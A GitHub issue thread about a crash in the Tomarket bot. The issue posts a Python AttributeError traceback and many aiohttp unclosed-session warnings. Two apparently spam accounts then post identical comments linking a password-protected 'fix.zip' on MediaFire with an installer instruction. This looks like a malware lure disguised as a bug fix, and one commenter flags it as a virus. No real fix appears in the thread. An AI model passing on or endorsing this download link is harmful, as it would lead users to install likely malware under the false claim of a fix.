### ISSUE TITLE
Unclosed connector

### ISSUE THREAD

**Issue by pasha140395** [GravelFire/Tomarket#5]
2024-08-28 10:36:26 | INFO     | 306 - 57_user | Start game...
Traceback (most recent call last):
  File "C:\Users\fx.twin\cd_github\Tomarket\main.py", line 13, in <module>
    asyncio.run(main())
  File "C:\Users\fx.twin\AppData\Local\Programs\Python\Python311\Lib\asyncio\runners.py", line 190, in run
    return runner.run(main)
           ^^^^^^^^^^^^^^^^
  File "C:\Users\fx.twin\AppData\Local\Programs\Python\Python311\Lib\asyncio\runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\fx.twin\AppData\Local\Programs\Python\Python311\Lib\asyncio\base_events.py", line 654, in run_until_complete
    return future.result()
           ^^^^^^^^^^^^^^^
  File "C:\Users\fx.twin\cd_github\Tomarket\main.py", line 8, in main
    await process()
  File "C:\Users\fx.twin\cd_github\Tomarket\bot\utils\launcher.py", line 96, in process
    await run_tasks(tg_clients=tg_clients)
  File "C:\Users\fx.twin\cd_github\Tomarket\bot\utils\launcher.py", line 112, in run_tasks
    await asyncio.gather(*tasks)
  File "C:\Users\fx.twin\cd_github\Tomarket\bot\core\tapper.py", line 364, in run_tapper
    await Tapper(tg_client=tg_client, proxy=proxy).run()
  File "C:\Users\fx.twin\cd_github\Tomarket\bot\core\tapper.py", line 308, in run
    if play_game.get('status') == 0:
       ^^^^^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'get'
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BF000>, 72432.14)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905B037710>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905C14F950>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF7AF0>, 72410.421)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905C10EB50>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFA2A50>, 72409.984)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905B014150>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905AFB2ED0>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905F43AD50>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905A9DFE50>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF71C0>, 72410.0)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D1C19D0>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905F371150>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905B00E790>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905C14D610>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905D20F850>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF62E0>, 72406.64)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905B00C550>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFA3700>, 72421.796)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905E2E58D0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BF2A0>, 72425.046)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D1C92D0>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905C152890>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905E29CE50>, 72431.125)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F46A9D0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905E29DEF0>, 72430.765)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905E35AFD0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF5E10>, 72425.687)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F360090>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BC8A0>, 72429.875)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F41B190>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905AFEE410>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905B070210>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905E29E740>, 72413.093)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D20BE10>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFA0280>, 72407.984)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D255810>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BDF60>, 72423.312)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F396CD0>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905E30AA90>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905B041250>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905E359BD0>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905E2D3D90>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF4D70>, 72408.375)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905AFF20D0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF4F30>, 72413.781)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905E2E4090>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905A9C6040>, 72408.984)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D1B7450>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905F42B810>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BF0E0>, 72412.078)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905E310490>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905D257310>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905AA0DCD0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF57F0>, 72410.031)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D1B5E90>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFA2DD0>, 72407.828)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D1F2B90>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BCF30>, 72422.625)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F3F85D0>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905C150550>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905E281D50>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BF850>, 72416.468)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905B035D90>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905F3CB050>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905F4693D0>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905E3533D0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BC670>, 72424.718)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905C18F690>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFA2970>, 72429.718)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905E330A50>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF7D90>, 72426.046)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F38A590>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905C142750>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFA3000>, 72407.75)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905AFF0650>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BF9A0>, 72423.218)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905E2A9290>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BE5F0>, 72431.812)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905AF7DE90>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF4EC0>, 72425.984)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F3C8F90>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905AFCFE90>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF4210>, 72432.703)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F3F2ED0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF64A0>, 72424.203)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F3B7790>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF5710>, 72426.937)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905F496650>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905B034710>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905A9C59B0>, 72412.671)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905C184490>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BC750>, 72415.312)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905E2B8D90>
Unclosed client session
client_session: <aiohttp.client.ClientSession object at 0x000001905B070F10>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905A9C6CF0>, 72412.718)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905C16BA10>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BFA80>, 72411.468)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D221C50>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905E29E580>, 72407.937)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905D2540D0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905A9C66D0>, 72407.156)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905B072690>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF7E70>, 72422.984)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905B0277D0>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905AFF5F60>, 72410.625)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905AFCD110>
Unclosed connector
connections: ['[(<aiohttp.client_proto.ResponseHandler object at 0x000001905C1BC520>, 72417.265)]']
connector: <aiohttp_proxy.connector.ProxyConnector object at 0x000001905B079490>
Restarting the program in 10 seconds...

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by khosrowkhazraei** [comment]
Virus

Better you give us your mom address 😂

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
